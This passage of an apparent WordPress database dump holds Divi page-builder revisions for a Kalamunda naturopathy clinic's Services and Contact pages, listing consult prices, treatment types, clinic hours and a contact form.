header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-09 20:44:21','2025-04-09 12:44:21','',424,'https://verdenaturopathy.com.au/?p=455',0,'revision','',0),(437,1,'2025-04-01 20:16:43','2025-04-01 12:16:43','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 20:16:43','2025-04-01 12:16:43','',424,'https://verdenaturopathy.com.au/?p=437',0,'revision','',0),(446,1,'2025-04-01 20:39:52','2025-04-01 12:39:52','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"><a href=\"mailto:hello@verdenaturopathy.com.au\">hello@verdenaturopathy.com.au</a></span></span></h3>\n<p><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"></span></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" 